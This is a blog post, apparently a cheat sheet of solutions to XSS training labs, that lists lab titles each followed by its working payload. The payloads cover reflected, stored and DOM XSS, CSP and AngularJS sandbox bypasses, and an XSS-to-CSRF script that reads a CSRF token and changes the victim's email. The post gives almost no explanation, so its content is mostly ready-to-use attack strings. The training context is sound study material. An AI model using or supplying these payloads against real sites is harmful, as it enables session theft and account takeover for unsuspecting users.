Reflected DOM XSS - quotes escaped, backslash not
\"-alert(1)}// Reflected XSS into HTML context with no encoding <script>alert(1)</script> Reflected XSS into HTML context with most tags and attributes blocked <iframe src="https://vulnerable-site.com/?param=%22%3E%3Cbody%20onresize=alert(document.cookie)%3E" onload=this.style.width='100px'> Reflected XSS into HTML context with all tags blocked except custom ones using onfocus <script>location = 'https://vulnerable-site.com/?param=%3Cxss+id%3Dx+onfocus%3Dalert%28document.cookie%29%20tabindex=1%3E#x'; </script> Reflected XSS with event handlers and href attributes blocked https://vulnerable-site.com/?param=%3Csvg%3E%3Ca%3E%3Canimate+attributeName%3Dhref+values%3Djavascript%3Aalert(1)+%2F%3E%3Ctext+x%3D20+y%3D20%3EClick%20here%3C%2Ftext%3E%3C%2Fa%3E Reflected XSS with some SVG markup allowed using onbegin https://vulnerable-site.com/?param=%22%3E%3Csvg%3E%3Canimatetransform%20onbegin=alert(1)%3E Reflected XSS into attribute with angle brackets HTML-encoded "onmouseover="alert(1)Stored XSS into HTML context with nothing encoded<script>alert(1)</script>Stored XSS into anchor href attribute with double quotes HTML-encoded javascript:alert(1) Reflected XSS in canonical link tag using OS access keys https://vulnerable-site.com/?%27accesskey=%27x%27onclick=%27alert(1) Reflected XSS into a JavaScript string with single quote and backslash escaped </script><script>alert(1)</script> Reflected XSS into a JavaScript string with angle brackets HTML encoded '-alert(1)-' Reflected XSS into a JavaScript string with angle brackets and double quotes HTML-encoded and single quotes escaped test'payload test\payload \'-alert(1)// Reflected XSS in a JavaScript URL with some characters blocked https://vulnerable-site.com/post?postId=5&%27},x=x=%3E{throw/**/onerror=alert,1337},toString=x,window%2b%27%27,{x:%27 Stored XSS into onclick event with angle brackets and double quotes HTML-encoded and single quotes and backslash escaped http://foo?'-alert(1)-' Reflected XSS into a template literal with angle brackets, single, double quotes, backslash and backticks Unicode-escaped ${alert(1)} Reflected XSS with AngularJS sandbox escape without strings https://vulnerable-site.com/?search=1&toString().constructor.prototype.charAt%3d[].join;[1]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)=1 Reflected XSS with AngularJS sandbox escape and CSP <script> location='https://vulnerable-site.com/?search=%3Cinput%20id=x%20ng-focus=$event.path|orderBy:%27(z=alert)(document.cookie)%27%3E#x'; </script> DOM XSS in document.write sink using source location.search "><svg onload=alert(1)> DOM XSS in document.write sink using source location.search inside a select element param?paramId=1&storeId="></select><img%20src=1%20onerror=alert(1)> DOM XSS in innerHTML sink using source location.search <img src=1 onerror=alert(1)> DOM XSS in jQuery anchor href attribute sink using location.search source javascript:alert(document.cookie) DOM XSS in AngularJS expression with angle brackets and double quotes HTML-encoded {{$on.constructor('alert(1)')()}}Stored DOM XSS <><img src=1 onerror=alert(1)> Exploiting XSS to perform CSRF <script> var req = new XMLHttpRequest(); req.onload = handleResponse; req.open('get','/site-endpoint',true); req.send(); function handleResponse() { var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1]; var changeReq = new XMLHttpRequest(); changeReq.open('post', '/site-endpoint/request', true); changeReq.send('csrf='+token+'&[email protected]') }; </script> Reflected XSS protected by CSP, with CSP bypass https://vulnerable-site.com/?search=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&token=;script-src-elem%20%27unsafe-inline%27
0 Comments
Your comment will be posted after it is approved.
Leave a Reply. |
AuthorExploring Android and mobile web design, security, and development. Archives
March 2021
Categories |